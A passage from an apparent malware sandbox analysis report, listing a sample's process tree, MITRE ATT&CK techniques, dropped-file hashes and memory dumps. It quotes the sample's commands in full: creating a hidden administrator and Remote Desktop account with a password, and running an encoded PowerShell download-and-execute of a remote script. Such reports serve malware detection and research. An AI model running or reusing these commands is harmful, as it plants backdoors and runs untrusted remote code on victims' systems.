        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4784
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:372
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:3132
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:540

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2596
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc Ghasar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del
    3⤵
    PID:4924

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc xvGlb8rE /add
1⤵
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc xvGlb8rE /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc xvGlb8rE /add
    3⤵
    PID:396

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3048
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:2704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:2828

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" JKRSODLE$ /ADD
1⤵
PID:2904
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" JKRSODLE$ /ADD
  2⤵
  PID:2632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JKRSODLE$ /ADD
    3⤵
    PID:3488

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:5000
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:3068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:4416

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc xvGlb8rE
1⤵
PID:3304
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc xvGlb8rE
  2⤵
  PID:1056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc xvGlb8rE
    3⤵
    PID:452

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4600
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:3052

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:5056
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3804

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1048
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES4805.tmp

Filesize
1KB

MD5
6e46a73dcba79b159f05abdc2b911d90

SHA1
6a9007eedce0287139085b7bc8af28bc72cdd080

SHA256
d6d3be795e1e891cc3f133b7a2f800c7ab6fc6f86db02f5de35bc08ec38506d3

SHA512
c054dc70a7ea20be99a5c04dfae560009e3e85135e2a1718012b7f1c7729e593f05bf5ce45a630a0138acb6d2a48e5b71cf294f5c576bd5336650938e9262db5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_43m41yjn.bec.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

Filesize
2.5MB

MD5
5db5ffa607b5b5ca17bfd6fb78403660

SHA1
1e793958cb1dd1dc99da4a50beaa2945561b7a16

SHA256
1fa24f444e6b18ab2072201a5d9de4df325830990f073194addb5327137c2e89

SHA512
3d2eab2b02c1d7302b563e3cc232791e242c8d2686a0a4cb58115cdd4ca19f48e390791404f62fef2c0fdbe3e5185b260de6a8fd5ccef2e091d473e0186ffe43

Download Submit
C:\Users\Admin\AppData\Local\Temp\ig145d0f\ig145d0f.dll

Filesize
3KB

MD5
e4b2f32bd9111aa235e4fc8df5e72391

SHA1
04b4a0ff88ca1ab67f02bf6909e6995cee460e5c

SHA256
76295792ba2dee05186bed21006f1f85584d4f7aa879fd5502e14b4dc74962c7

SHA512
23fbe1526f441a475e4a1ef0c9b56dc371b66626a12ce4abff4d05f3b2bd9d85d789b3413f0b3ca83b734291f0c00d822f9653c549f999163d8c2e0a92d20e72

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
96e498a3833f52ae46bcfdc391f73cf7

SHA1
ecaf72b46cf1cb074bde2914963bb1e61450ca95

SHA256
21a0a297e9a2295f7e32aea08ea74c01199cc57d30b8a177fa99c9cc96a6268b

SHA512
9f273a77d434807138c884cc95deb1cadea1ff6db492839d238759a265f3b0ded318b6af59d0743f8dd1555e968afb1eca9ba92a214ecd247480d2a072c08540

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
2ee3d03bb1f8bd257235fc70e92b17e1

SHA1
c36482b8f8229578dec1cc687aaf53084cb6d05e

SHA256
b7a9b4269995093c63efe64cb65e4562680af2fdf7c4dfdc235f2eb60c469ff0

SHA512
39f8a42a512e4bfbf84ac3c472bf9444a139da23b7007f57aa68dc9ba9db5466b7f155df18c0a49e3073527763ef459180ab1912e53453d312c17718ab67abea

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6F25.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ig145d0f\CSCBCD0C3FD37AB4AE28434A37E3FC55AAE.TMP

Filesize
652B

MD5
906e89b7f37e0fb945c47addf83478a2

SHA1
7d33c24d08b4cfce7e051e6bf1e39d15c96426c7

SHA256
8f5b9d91c99e5ca0278a1cfda69ced39f85ee12dae6f3fe84c36ea69a04cfd98

SHA512
92e7860e48e8818966c9feca6827a7cb413e9190f09c034ebd4b95ae548d2ae0d46ccd6c867151bf7bb3d0d4c1781333798f9f529978909ab748d81b1c11c4cb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ig145d0f\ig145d0f.0.cs

Filesize
424B

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ig145d0f\ig145d0f.cmdline

Filesize
369B

MD5
aa24a4b96e95857fd138765731ef5c26

SHA1
a467410a23b1eccd34c67c02d259f15354062f7e

SHA256
733bdd6bbd22f731591af6bbe6788636c353253973048ee9051ea069831356b1

SHA512
5e5f0b638bbd741f69211a92c5ff376535102165e419a4cd1efb6f2c9ad4c19350b5a1c704e6a3c8644644b1368ecaeaad8c7f1a89b139b04e4857a284cbac50

Download Submit
memory/3108-69-0x00007FF8881F0000-0x00007FF888CB1000-memory.dmp

Filesize
10.8MB

Download
memory/3108-59-0x000001E676500000-0x000001E676510000-memory.dmp

Filesize
64KB

Download
memory/3108-58-0x00007FF8881F0000-0x00007FF888CB1000-memory.dmp

Filesize
10.8MB

Download
memory/3564-114-0x00000277F3E70000-0x00000277F3E80000-memory.dmp

Filesize
64KB

Download
memory/3564-156-0x00007FF8881F0000-0x00007FF888CB1000-memory.dmp

Filesize
10.8MB

Download
memory/3564-120-0x00000277F3E70000-0x00000277F3E80000-memory.dmp

Filesize
64KB

Download
memory/3564-115-0x00000277F3E70000-0x00000277F3E80000-memory.dmp

Filesize
64KB

Download
memory/3564-113-0x00007FF8881F0000-0x00007FF888CB1000-memory.dmp

Filesize
10.8MB

Download
memory/3608-70-0x00007FF8881F0000-0x00007FF888CB1000-memory.dmp

Filesize
10.8MB

Download
memory/3608-82-0x00007FF8881F0000-0x00007FF888CB1000-memory.dmp

Filesize
10.8MB

Download
memory/3608-77-0x0000014078820000-0x0000014078830000-memory.dmp

Filesize
64KB

Download
memory/3608-76-0x0000014078820000-0x0000014078830000-memory.dmp

Filesize
64KB

Download
memory/4376-55-0x000001504BDE0000-0x000001504BDF0000-memory.dmp

Filesize
64KB

Download
memory/4376-54-0x00007FF8881F0000-0x00007FF888CB1000-memory.dmp

Filesize
10.8MB

Download
memory/4376-56-0x000001504BDE0000-0x000001504BDF0000-memory.dmp

Filesize
64KB

Download
memory/4376-57-0x00007FF8881F0000-0x00007FF888CB1000-memory.dmp

Filesize
10.8MB

Download
memory/4948-9-0x00000246ED260000-0x00000246ED270000-memory.dmp

Filesize
64KB

Download
memory/4948-6-0x00007FF8881F0000-0x00007FF888CB1000-memory.dmp

Filesize
10.8MB

Download
memory/4948-169-0x00007FF8881F0000-0x00007FF888CB1000-memory.dmp

Filesize
10.8MB

Download
memory/4948-168-0x00000246EDA80000-0x00000246EDC29000-memory.dmp

Filesize
1.7MB

Download
memory/4948-5-0x00000246ED680000-0x00000246EDA84000-memory.dmp

Filesize
4.0MB

Download
memory/4948-83-0x00000246EDA80000-0x00000246EDC29000-memory.dmp

Filesize
1.7MB

Download
memory/4948-84-0x00007FF8881F0000-0x00007FF888CB1000-memory.dmp

Filesize
10.8MB

Download
memory/4948-0-0x0000000001000000-0x0000000001E46000-memory.dmp

Filesize
14.3MB

Download
memory/4948-107-0x00000246ED260000-0x00000246ED270000-memory.dmp

Filesize
64KB

Download
memory/4948-7-0x00000246ED260000-0x00000246ED270000-memory.dmp

Filesize
64KB

Download
memory/4948-102-0x00000246ED260000-0x00000246ED270000-memory.dmp

Filesize
64KB

Download
memory/4948-103-0x00000246ED260000-0x00000246ED270000-memory.dmp

Filesize
64KB

Download
memory/4948-104-0x00000246ED260000-0x00000246ED270000-memory.dmp

Filesize
64KB

Download
memory/4948-8-0x00000246ED260000-0x00000246ED270000-memory.dmp

Filesize
64KB

Download
memory/4980-28-0x000001AEB9F40000-0x000001AEB9F50000-memory.dmp

Filesize
64KB

Download
memory/4980-152-0x000001AEB9F40000-0x000001AEB9F50000-memory.dmp

Filesize
64KB

Download
memory/4980-43-0x000001AEBA650000-0x000001AEBA7C6000-memory.dmp

Filesize
1.5MB

Download
memory/4980-85-0x00007FF896C90000-0x00007FF896CA9000-memory.dmp

Filesize
100KB

Download
memory/4980-42-0x000001AEB9F40000-0x000001AEB9F50000-memory.dmp

Filesize
64KB

Download
memory/4980-19-0x000001AEB9F40000-0x000001AEB9F50000-memory.dmp

Filesize
64KB

Download
memory/4980-44-0x000001AEBA9E0000-0x000001AEBABEA000-memory.dmp

Filesize
2.0MB

Download
memory/4980-151-0x00007FF8881F0000-0x00007FF888CB1000-memory.dmp

Filesize
10.8MB

Download
memory/4980-153-0x000001AEB9F40000-0x000001AEB9F50000-memory.dmp

Filesize
64KB

Download
memory/4980-17-0x000001AEB9ED0000-0x000001AEB9EF2000-memory.dmp

Filesize
136KB

Download
memory/4980-39-0x000001AEB9EC0000-0x000001AEB9EC8000-memory.dmp

Filesize
32KB

Download
memory/4980-157-0x000001AEB9F40000-0x000001AEB9F50000-memory.dmp

Filesize
64KB

Download
memory/4980-160-0x000001AEB9F40000-0x000001AEB9F50000-memory.dmp

Filesize
64KB

Download
memory/4980-165-0x00007FF8881F0000-0x00007FF888CB1000-memory.dmp

Filesize
10.8MB

Download
memory/4980-166-0x00007FF896C90000-0x00007FF896CA9000-memory.dmp

Filesize
100KB

Download
memory/4980-20-0x000001AEB9F40000-0x000001AEB9F50000-memory.dmp

Filesize
64KB

Download
memory/4980-18-0x00007FF8881F0000-0x00007FF888CB1000-memory.dmp

Filesize
10.8MB

Download